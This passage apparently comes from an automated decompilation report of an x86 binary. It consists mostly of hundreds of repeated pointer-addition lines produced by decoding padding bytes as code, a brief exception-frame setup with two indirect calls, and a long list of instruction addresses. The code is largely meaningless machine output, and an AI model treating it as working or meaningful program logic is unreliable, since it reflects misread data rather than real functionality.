                                                                        					 *_t1115 =  *_t1115 + _t1115;
                                                                        				}
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				 *_t1115 =  *_t1115 + _t1115;
                                                                        				_v1744814033 = _v1744814033 + _t1115;
                                                                        				asm("das");
                                                                        				_t1116 = _t1115 + 1;
                                                                        				 *_t1116 =  *_t1116 + _t1116;
                                                                        				 *_t1116 =  *_t1116 + _t1116;
                                                                        				 *_t1116 =  *_t1116 + _t1116;
                                                                        				 *_t1116 =  *_t1116 + _t1116;
                                                                        				 *_t1116 =  *_t1116 + _t1116;
                                                                        				 *_t1116 =  *_t1116 + _t1116;
                                                                        				 *_t1116 =  *_t1116 + _t1116;
                                                                        				 *_t1116 =  *_t1116 + _t1116;
                                                                        				 *_t1116 =  *_t1116 + _t1116;
                                                                        				 *_t1116 =  *_t1116 + _t1116;
                                                                        				 *_t1116 =  *_t1116 + _t1116;
                                                                        				 *_t1116 =  *_t1116 + _t1116;
                                                                        				 *_t1116 =  *_t1116 + _t1116;
                                                                        				 *_t1116 =  *_t1116 + _t1116;
                                                                        				 *_t1116 =  *_t1116 + _t1116;
                                                                        				 *_t1116 =  *_t1116 + _t1116;
                                                                        				 *((intOrPtr*)(_t1309 +  &_a735838272)) =  *((intOrPtr*)(_t1309 +  &_a735838272)) + _t1221;
                                                                        				_t1117 = _t1116 + 1;
                                                                        				 *((intOrPtr*)(_t1117 + 0x11)) =  *((intOrPtr*)(_t1117 + 0x11)) + _t1269;
                                                                        				 *((intOrPtr*)(_t1278 + 0x11)) =  *((intOrPtr*)(_t1278 + 0x11)) + _t1269;
                                                                        				_t1119 = _t1117 + 2;
                                                                        				 *((intOrPtr*)(_t1221 + _t1269 + 0x40)) =  *((intOrPtr*)(_t1221 + _t1269 + 0x40)) + _t1214;
                                                                        				 *_t1119 =  *_t1119 + _t1119;
                                                                        				 *_t1119 =  *_t1119 + _t1119;
                                                                        				 *_t1119 =  *_t1119 + _t1119;
                                                                        				 *_t1119 =  *_t1119 + _t1119;
                                                                        				 *_t1119 =  *_t1119 + _t1119;
                                                                        				 *_t1119 =  *_t1119 + _t1119;
                                                                        				 *_t1119 =  *_t1119 + _t1119;
                                                                        				 *_t1119 =  *_t1119 + _t1119;
                                                                        				 *_t1119 =  *_t1119 + _t1119;
                                                                        				 *_t1119 =  *_t1119 + _t1119;
                                                                        				 *_t1119 =  *_t1119 + _t1119;
                                                                        				 *_t1119 =  *_t1119 + _t1119;
                                                                        				 *_t1119 =  *_t1119 + _t1119;
                                                                        				 *_t1119 =  *_t1119 + _t1119;
                                                                        				 *_t1119 =  *_t1119 + _t1119;
                                                                        				 *_t1119 =  *_t1119 + _t1119;
                                                                        				 *_t1119 =  *_t1119 + _t1119;
                                                                        				 *_t1119 =  *_t1119 + _t1119;
                                                                        				 *_t1119 =  *_t1119 + _t1119;
                                                                        				 *_t1119 =  *_t1119 + _t1119;
                                                                        				 *_t1119 =  *_t1119 + _t1119;
                                                                        				 *_t1119 =  *_t1119 + _t1119;
                                                                        				 *_t1119 =  *_t1119 + _t1119;
                                                                        				 *_t1119 =  *_t1119 + _t1119;
                                                                        				 *_t1119 =  *_t1119 + _t1119;
                                                                        				 *_t1119 =  *_t1119 + _t1119;
                                                                        				 *_t1119 =  *_t1119 + _t1119;
                                                                        				 *_t1119 =  *_t1119 + _t1119;
                                                                        				 *_t1119 =  *_t1119 + _t1119;
                                                                        				 *_t1119 =  *_t1119 + _t1119;
                                                                        				 *_t1119 =  *_t1119 + _t1119;
                                                                        				 *_t1119 =  *_t1119 + _t1119;
                                                                        				 *((intOrPtr*)(_t1309 +  &_a735838272)) =  *((intOrPtr*)(_t1309 +  &_a735838272)) + _t1269;
                                                                        				_t1120 = _t1119 + 1;
                                                                        				 *((intOrPtr*)(_t1120 + 0x11)) =  *((intOrPtr*)(_t1120 + 0x11)) + _t1269;
                                                                        				 *((intOrPtr*)(_t1278 + 0x11)) =  *((intOrPtr*)(_t1278 + 0x11)) + _t1269;
                                                                        				_t1122 = _t1120 + 2;
                                                                        				 *((intOrPtr*)(_t1221 + _t1269 + 0x40)) =  *((intOrPtr*)(_t1221 + _t1269 + 0x40)) + _t1214;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				 *_t1122 =  *_t1122 + _t1122;
                                                                        				_t1126 = _t1122 + _t1214 - 0x40 + _t1214 -  *((intOrPtr*)(_t1122 + _t1214 - 0x40 + _t1214));
                                                                        				if(_t1126 >= 0) {
                                                                        					 *((intOrPtr*)(_t1278 + 0x11)) =  *((intOrPtr*)(_t1278 + 0x11)) + _t1269;
                                                                        					_t1126 = _t1126 + 2;
                                                                        					 *((intOrPtr*)(_t1221 + _t1269 + 0x40)) =  *((intOrPtr*)(_t1221 + _t1269 + 0x40)) + _t1214;
                                                                        					 *_t1126 =  *_t1126 + _t1126;
                                                                        					 *_t1126 =  *_t1126 + _t1126;
                                                                        					 *_t1126 =  *_t1126 + _t1126;
                                                                        					 *_t1126 =  *_t1126 + _t1126;
                                                                        				}
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				 *_t1126 =  *_t1126 + _t1126;
                                                                        				_a735838272 = _a735838272 + _t1126;
                                                                        				_t1127 = _t1126 + 1;
                                                                        				 *((intOrPtr*)(_t1127 + 0x11)) =  *((intOrPtr*)(_t1127 + 0x11)) + _t1269;
                                                                        				 *((intOrPtr*)(_t1278 + 0x11)) =  *((intOrPtr*)(_t1278 + 0x11)) + _t1269;
                                                                        				_t1129 = _t1127 + 2;
                                                                        				 *((intOrPtr*)(_t1221 + _t1269 + 0x40)) =  *((intOrPtr*)(_t1221 + _t1269 + 0x40)) + _t1214;
                                                                        				 *_t1129 =  *_t1129 + _t1129;
                                                                        				 *_t1129 =  *_t1129 + _t1129;
                                                                        				 *_t1129 =  *_t1129 + _t1129;
                                                                        				 *_t1129 =  *_t1129 + _t1129;
                                                                        				 *_t1129 =  *_t1129 + _t1129;
                                                                        				 *_t1129 =  *_t1129 + _t1129;
                                                                        				 *_t1129 =  *_t1129 + _t1129;
                                                                        				 *_t1129 =  *_t1129 + _t1129;
                                                                        				 *_t1129 =  *_t1129 + _t1129;
                                                                        				 *_t1129 =  *_t1129 + _t1129;
                                                                        				 *_t1129 =  *_t1129 + _t1129;
                                                                        				 *_t1129 =  *_t1129 + _t1129;
                                                                        				 *_t1129 =  *_t1129 + _t1129;
                                                                        				 *_t1129 =  *_t1129 + _t1129;
                                                                        				 *_t1129 =  *_t1129 + _t1129;
                                                                        				 *_t1129 =  *_t1129 + _t1129;
                                                                        				 *_t1129 =  *_t1129 + _t1129;
                                                                        				 *_t1129 =  *_t1129 + _t1129;
                                                                        				 *_t1129 =  *_t1129 + _t1129;
                                                                        				 *_t1129 =  *_t1129 + _t1129;
                                                                        				 *_t1129 =  *_t1129 + _t1129;
                                                                        				 *_t1129 =  *_t1129 + _t1129;
                                                                        				 *_t1129 =  *_t1129 + _t1129;
                                                                        				 *_t1129 =  *_t1129 + _t1129;
                                                                        				 *_t1129 =  *_t1129 + _t1129;
                                                                        				 *_t1129 =  *_t1129 + _t1129;
                                                                        				 *_t1129 =  *_t1129 + _t1129;
                                                                        				 *_t1129 =  *_t1129 + _t1129;
                                                                        				 *_t1129 =  *_t1129 + _t1129;
                                                                        				 *_t1129 =  *_t1129 + _t1129;
                                                                        				 *_t1129 =  *_t1129 + _t1129;
                                                                        				 *_t1129 =  *_t1129 + _t1129;
                                                                        				 *_t1129 =  *_t1129 + _t1129;
                                                                        				 *_t1129 =  *_t1129 + _t1129;
                                                                        				_a735838272 = _a735838272 + _t1221;
                                                                        				_t1130 = _t1129 + 1;
                                                                        				 *((intOrPtr*)(_t1130 + 0x11)) =  *((intOrPtr*)(_t1130 + 0x11)) + _t1269;
                                                                        				 *((intOrPtr*)(_t1278 + 0x11)) =  *((intOrPtr*)(_t1278 + 0x11)) + _t1269;
                                                                        				_t1132 = _t1130 + 2;
                                                                        				 *((intOrPtr*)(_t1221 + _t1269 + 0x40)) =  *((intOrPtr*)(_t1221 + _t1269 + 0x40)) + _t1214;
                                                                        				 *_t1132 =  *_t1132 + _t1132;
                                                                        				 *_t1132 =  *_t1132 + _t1132;
                                                                        				 *((intOrPtr*)(_t1221 + 0x3b04246c)) =  *((intOrPtr*)(_t1221 + 0x3b04246c)) + _t1132;
                                                                        				_a71 = _a71 - 0x3b;
                                                                        				_t1310 = _t1309 - 0xc;
                                                                        				 *[fs:0x0] = _t1310;
                                                                        				_a51 = _t1310;
                                                                        				_a55 = 0x401098;
                                                                        				_a59 = _a71 & 0x00000001;
                                                                        				_a71 = _a71 & 0xfffffffe;
                                                                        				_t1136 = _a71;
                                                                        				 *((intOrPtr*)( *_t1136 + 4))(_t1136, 0x76, _t1278, _t1214, _t1221, _t1221,  *[fs:0x0], 0x4010b6, _t1281);
                                                                        				_a59 = 0;
                                                                        				_t1138 = _a71;
                                                                        				 *((intOrPtr*)( *_t1138 + 8))(_t1138);
                                                                        				 *[fs:0x0] = _a43;
                                                                        				return _a59;
                                                                        			}

                                                                        0x00401346
                                                                        0x00401348
                                                                        0x0040134e
                                                                        0x00401350
                                                                        0x00401351
                                                                        0x00401351
                                                                        0x00401354
                                                                        0x00000000
                                                                        0x00401354
                                                                        0x004012c9
                                                                        0x004012c9
                                                                        0x004012ca
                                                                        0x004012cb
                                                                        0x004012d2
                                                                        0x004012d4
                                                                        0x004012d6
                                                                        0x004012db
                                                                        0x004012dd
                                                                        0x004012df
                                                                        0x004012e1
                                                                        0x004012e3
                                                                        0x004012e4
                                                                        0x004012e7
                                                                        0x004012e8
                                                                        0x004012e9
                                                                        0x004012e9
                                                                        0x004012ea
                                                                        0x004012ed
                                                                        0x00401355
                                                                        0x00401355
                                                                        0x004012f0
                                                                        0x004012f0
                                                                        0x004012f1
                                                                        0x004012f5
                                                                        0x004012f6
                                                                        0x004012fc
                                                                        0x004012fe
                                                                        0x00401300
                                                                        0x00401302
                                                                        0x00401304
                                                                        0x00401306
                                                                        0x00401308
                                                                        0x00401309
                                                                        0x0040130d
                                                                        0x0040130e
                                                                        0x0040130f
                                                                        0x00401385
                                                                        0x00401387
                                                                        0x00401389
                                                                        0x0040138b
                                                                        0x0040138f
                                                                        0x00401391
                                                                        0x00401393
                                                                        0x00401398
                                                                        0x00401399
                                                                        0x0040139a
                                                                        0x0040139f
                                                                        0x004013a1
                                                                        0x004013a3
                                                                        0x004013a5
                                                                        0x004013a7
                                                                        0x004013a9
                                                                        0x004013ab
                                                                        0x004013ae
                                                                        0x004013b0
                                                                        0x004013b2
                                                                        0x004013b4
                                                                        0x004013b6
                                                                        0x004013b8
                                                                        0x004013b9
                                                                        0x004013bb
                                                                        0x004013bd
                                                                        0x004013bf
                                                                        0x004013c1
                                                                        0x004013c3
                                                                        0x004013c5
                                                                        0x004013c7
                                                                        0x004013cd
                                                                        0x004013ce
                                                                        0x004013cf
                                                                        0x004013d1
                                                                        0x004013d3
                                                                        0x004013d5
                                                                        0x004013d7
                                                                        0x004013d9
                                                                        0x004013db
                                                                        0x004013dd
                                                                        0x00401311
                                                                        0x00401313
                                                                        0x00401314
                                                                        0x00401316
                                                                        0x00401319
                                                                        0x00401328
                                                                        0x00401328
                                                                        0x00401329
                                                                        0x00000000
                                                                        0x00401329
                                                                        0x0040130f
                                                                        0x004012ed
                                                                        0x0040125f
                                                                        0x0040125f
                                                                        0x00401291
                                                                        0x00401291
                                                                        0x00401294
                                                                        0x00401296
                                                                        0x0040129a
                                                                        0x0040129b
                                                                        0x0040129f
                                                                        0x004012a2
                                                                        0x004012a6
                                                                        0x004012a7
                                                                        0x004012aa
                                                                        0x004012ab
                                                                        0x004012ae
                                                                        0x004012ae
                                                                        0x00000000
                                                                        0x00401261
                                                                        0x00401261
                                                                        0x00401267
                                                                        0x00401269
                                                                        0x0040126b
                                                                        0x0040126e
                                                                        0x00401272
                                                                        0x00401276
                                                                        0x00401278
                                                                        0x0040127c
                                                                        0x0040127e
                                                                        0x00000000
                                                                        0x0040127e
                                                                        0x0040125f
                                                                        0x0040125d
                                                                        0x0040124e
                                                                        0x004013df
                                                                        0x004013e1
                                                                        0x004013e5
                                                                        0x004013e6
                                                                        0x004013e7
                                                                        0x004013e7
                                                                        0x004013ed
                                                                        0x004013f0
                                                                        0x004013f2
                                                                        0x004013f4
                                                                        0x004013f7
                                                                        0x004013fe
                                                                        0x00401400
                                                                        0x00401402
                                                                        0x00401404
                                                                        0x00401406
                                                                        0x00401408
                                                                        0x0040140a
                                                                        0x0040140c
                                                                        0x0040140e
                                                                        0x00401410
                                                                        0x00401411
                                                                        0x00401412
                                                                        0x00401417
                                                                        0x0040144f
                                                                        0x0040144f
                                                                        0x00401451
                                                                        0x00401453
                                                                        0x00401453
                                                                        0x00401456
                                                                        0x00401458
                                                                        0x0040145a
                                                                        0x0040145c
                                                                        0x0040145e
                                                                        0x00401460
                                                                        0x00401462
                                                                        0x00401466
                                                                        0x00401467
                                                                        0x00401469
                                                                        0x0040146b
                                                                        0x00401471
                                                                        0x00401473
                                                                        0x00401479
                                                                        0x0040147b
                                                                        0x00401481
                                                                        0x00401483
                                                                        0x00000000
                                                                        0x0040141a
                                                                        0x0040141a
                                                                        0x0040141a
                                                                        0x0040141d
                                                                        0x00401488
                                                                        0x00401488
                                                                        0x0040148a
                                                                        0x0040148e
                                                                        0x0040148f
                                                                        0x00401491
                                                                        0x0040141f
                                                                        0x0040141f
                                                                        0x00401420
                                                                        0x00401424
                                                                        0x00401424
                                                                        0x00401427
                                                                        0x00401429
                                                                        0x0040142d
                                                                        0x00401430
                                                                        0x00401434
                                                                        0x0040143a
                                                                        0x00401441
                                                                        0x00401443
                                                                        0x00401445
                                                                        0x00401447
                                                                        0x0040144a
                                                                        0x0040144b
                                                                        0x0040144d
                                                                        0x00000000
                                                                        0x0040144d
                                                                        0x00401427
                                                                        0x0040141d
                                                                        0x00401499
                                                                        0x0040149b
                                                                        0x0040149d
                                                                        0x0040149e
                                                                        0x0040149f
                                                                        0x004014a1
                                                                        0x004014a3
                                                                        0x004014a7
                                                                        0x004014b2
                                                                        0x004014b3
                                                                        0x004014b6
                                                                        0x004014bb
                                                                        0x004014bd
                                                                        0x004014bf
                                                                        0x004014c1
                                                                        0x004014c3
                                                                        0x004014c5
                                                                        0x004014c7
                                                                        0x004014c9
                                                                        0x004014cb
                                                                        0x004014cd
                                                                        0x004014ce
                                                                        0x004014d0
                                                                        0x004014d0
                                                                        0x004014d4
                                                                        0x004014d6
                                                                        0x004014d8
                                                                        0x004014da
                                                                        0x004014df
                                                                        0x004014e1
                                                                        0x004014e3
                                                                        0x004014e7
                                                                        0x004014eb
                                                                        0x004014ef
                                                                        0x004014f1
                                                                        0x004014f3
                                                                        0x004014f5
                                                                        0x004014f7
                                                                        0x004014f9
                                                                        0x004014fb
                                                                        0x004014fd
                                                                        0x004014ff
                                                                        0x00401501
                                                                        0x00401503
                                                                        0x00401505
                                                                        0x00401507
                                                                        0x00401509
                                                                        0x0040150b
                                                                        0x0040150d
                                                                        0x0040150f
                                                                        0x00401511
                                                                        0x00401513
                                                                        0x00401515
                                                                        0x00401517
                                                                        0x00401519
                                                                        0x0040151b
                                                                        0x0040151d
                                                                        0x0040151f
                                                                        0x00401521
                                                                        0x00401523
                                                                        0x00401525
                                                                        0x00401527
                                                                        0x00401529
                                                                        0x0040152b
                                                                        0x0040152d
                                                                        0x0040152f
                                                                        0x00401531
                                                                        0x00401533
                                                                        0x00401535
                                                                        0x00401537
                                                                        0x00401539
                                                                        0x0040153b
                                                                        0x0040153d
                                                                        0x0040153f
                                                                        0x00401541
                                                                        0x00401543
                                                                        0x00401545
                                                                        0x00401547
                                                                        0x00401549
                                                                        0x0040154b
                                                                        0x0040154d
                                                                        0x0040154f
                                                                        0x00401551
                                                                        0x00401553
                                                                        0x00401555
                                                                        0x00401557
                                                                        0x00401559
                                                                        0x0040155b
                                                                        0x0040155d
                                                                        0x0040155f
                                                                        0x00401561
                                                                        0x00401563
                                                                        0x00401565
                                                                        0x00401567
                                                                        0x00401569
                                                                        0x0040156b
                                                                        0x0040156d
                                                                        0x0040156f
                                                                        0x00401573
                                                                        0x00401575
                                                                        0x00401577
                                                                        0x0040157a
                                                                        0x0040157d
                                                                        0x0040157f
                                                                        0x00401581
                                                                        0x00401583
                                                                        0x0040158a
                                                                        0x0040158b
                                                                        0x0040158d
                                                                        0x0040158f
                                                                        0x00401592
                                                                        0x00401594
                                                                        0x00401596
                                                                        0x00401598
                                                                        0x0040159a
                                                                        0x0040159c
                                                                        0x0040159e
                                                                        0x004015a0
                                                                        0x004015a3
                                                                        0x004015a5
                                                                        0x004015a7
                                                                        0x004015ab
                                                                        0x004015ad
                                                                        0x004015b1
                                                                        0x004015b6
                                                                        0x00401994
                                                                        0x00401996
                                                                        0x0040199b
                                                                        0x0040199e
                                                                        0x0040199f
                                                                        0x004019a2
                                                                        0x004019a3
                                                                        0x004019a6
                                                                        0x004019aa
                                                                        0x004019ab
                                                                        0x004019ad
                                                                        0x004019af
                                                                        0x004019b1
                                                                        0x004019b3
                                                                        0x004019b5
                                                                        0x004019b7
                                                                        0x004019b9
                                                                        0x004019bc
                                                                        0x004019bf
                                                                        0x004019c6
                                                                        0x004019c8
                                                                        0x004019ca
                                                                        0x004019cc
                                                                        0x004019d1
                                                                        0x004019d4
                                                                        0x004019d7
                                                                        0x004019da
                                                                        0x004019db
                                                                        0x004019df
                                                                        0x004019e1
                                                                        0x004019e3
                                                                        0x004019e5
                                                                        0x004019e5
                                                                        0x004019e7
                                                                        0x004019e9
                                                                        0x004019eb
                                                                        0x004019ed
                                                                        0x004019ef
                                                                        0x004019f1
                                                                        0x004019f3
                                                                        0x004019f5
                                                                        0x004019f7
                                                                        0x004019f9
                                                                        0x004019fb
                                                                        0x004019fd
                                                                        0x004019ff
                                                                        0x00401a01
                                                                        0x00401a03
                                                                        0x00401a05
                                                                        0x00401a07
                                                                        0x00401a09
                                                                        0x00401a0b
                                                                        0x00401a0d
                                                                        0x00401a0f
                                                                        0x00401a11
                                                                        0x00401a13
                                                                        0x00401a15
                                                                        0x00401a17
                                                                        0x00401a19
                                                                        0x00401a1b
                                                                        0x00401a1d
                                                                        0x00401a1f
                                                                        0x00401a21
                                                                        0x00401a23
                                                                        0x00401a25
                                                                        0x00401a27
                                                                        0x00401a29
                                                                        0x00401a2b
                                                                        0x00401a2d
                                                                        0x00401a2f
                                                                        0x00401a31
                                                                        0x00401a33
                                                                        0x00401a35
                                                                        0x00401a37
                                                                        0x00401a39
                                                                        0x00401a3b
                                                                        0x00401a3d
                                                                        0x00401a3f
                                                                        0x00401a41
                                                                        0x00401a43
                                                                        0x00401a45
                                                                        0x00401a47
                                                                        0x00401a49
                                                                        0x00401a4b
                                                                        0x00401a4d
                                                                        0x00401a4f
                                                                        0x00401a51
                                                                        0x00401a53
                                                                        0x00401a55
                                                                        0x00401a57
                                                                        0x00401a59
                                                                        0x00401a5b
                                                                        0x00401a5d
                                                                        0x00401a5f
                                                                        0x00401a62
                                                                        0x00401a63
                                                                        0x00401a65
                                                                        0x00401a67
                                                                        0x00401a69
                                                                        0x00401a6c
                                                                        0x00401a6e
                                                                        0x00401a70
                                                                        0x00401a72
                                                                        0x00401a74
                                                                        0x00401a76
                                                                        0x00401a77
                                                                        0x00401a7b
                                                                        0x00401a7d
                                                                        0x00401a7f
                                                                        0x00401a86
                                                                        0x00401a88
                                                                        0x00401a8a
                                                                        0x00401a8c
                                                                        0x00401a8e
                                                                        0x00401a90
                                                                        0x00401a92
                                                                        0x00401a93
                                                                        0x00401a95
                                                                        0x00401a97
                                                                        0x00401a9b
                                                                        0x00401a9d
                                                                        0x00401a9f
                                                                        0x00401aa1
                                                                        0x00401aa4
                                                                        0x00401aa6
                                                                        0x00401aa8
                                                                        0x00401aaa
                                                                        0x00401aab
                                                                        0x00401aad
                                                                        0x00401aaf
                                                                        0x00401ab1
                                                                        0x00401ab4
                                                                        0x00401ab6
                                                                        0x00401ab8
                                                                        0x00401aba
                                                                        0x00401abb
                                                                        0x00401abd
                                                                        0x00401ac3
                                                                        0x00401ac7
                                                                        0x00401ac9
                                                                        0x00401acc
                                                                        0x00401ace
                                                                        0x00401ad0
                                                                        0x00401ad1
                                                                        0x00401ad2
                                                                        0x00401ad4
                                                                        0x00401ad6
                                                                        0x00401ad7
                                                                        0x00401adb
                                                                        0x00401ade
                                                                        0x00401adf
                                                                        0x00401ae2
                                                                        0x00401ae6
                                                                        0x00401ae7
                                                                        0x00401ae9
                                                                        0x00401aeb
                                                                        0x00401aed
                                                                        0x00401aef
                                                                        0x00401af1
                                                                        0x00401af3
                                                                        0x00401af6
                                                                        0x00401af7
                                                                        0x00401af9
                                                                        0x00401afa
                                                                        0x00401afc
                                                                        0x00401afc
                                                                        0x00401b00
                                                                        0x00401b02
                                                                        0x00401b04
                                                                        0x00401b06
                                                                        0x00401b08
                                                                        0x00401b0a
                                                                        0x00401b0b
                                                                        0x00401b0f
                                                                        0x00401b13
                                                                        0x00401b16
                                                                        0x00401b17
                                                                        0x00401b1b
                                                                        0x00401b1d
                                                                        0x00401b1f
                                                                        0x00401b21
                                                                        0x00401b23
                                                                        0x00401b25
                                                                        0x00401b27
                                                                        0x00401b29
                                                                        0x00401b2b
                                                                        0x00401b2d
                                                                        0x00401b2f
                                                                        0x00401b31
                                                                        0x00401b33
                                                                        0x00401b35
                                                                        0x00401b37
                                                                        0x00401b39
                                                                        0x00401b3b
                                                                        0x00401b3d
                                                                        0x00401b3f
                                                                        0x00401b41
                                                                        0x00401b43
                                                                        0x00401b45
                                                                        0x00401b47
                                                                        0x00401b49
                                                                        0x00401b4b
                                                                        0x00401b4d
                                                                        0x00401b4f
                                                                        0x00401b51
                                                                        0x00401b53
                                                                        0x00401b55
                                                                        0x00401b57
                                                                        0x00401b59
                                                                        0x00401b5b
                                                                        0x00401b5d
                                                                        0x00401b5f
                                                                        0x00401b61
                                                                        0x00401b63
                                                                        0x00401b65
                                                                        0x00401b67
                                                                        0x00401b69
                                                                        0x00401b6b
                                                                        0x00401b6d
                                                                        0x00401b6f
                                                                        0x00401b71
                                                                        0x00401b73
                                                                        0x00401b75
                                                                        0x00401b77
                                                                        0x00401b79
                                                                        0x00401b7b
                                                                        0x00401b7d
                                                                        0x00401b7f
                                                                        0x00401b81
                                                                        0x00401b83
                                                                        0x00401b85
                                                                        0x00401b87
                                                                        0x00401b89
                                                                        0x00401b8b
                                                                        0x00401b8d
                                                                        0x00401b8f
                                                                        0x00401b91
                                                                        0x00401b93
                                                                        0x00401b95
                                                                        0x00401b97
                                                                        0x00401b99
                                                                        0x00401b9f
                                                                        0x00401ba1
                                                                        0x00401ba3
                                                                        0x00401ba7
                                                                        0x00401ba9
                                                                        0x00401bab
                                                                        0x00401bad
                                                                        0x00401baf
                                                                        0x00401bb6
                                                                        0x00401bb7
                                                                        0x00401bb9
                                                                        0x00401bbb
                                                                        0x00401bc1
                                                                        0x00401bc3
                                                                        0x00401bc5
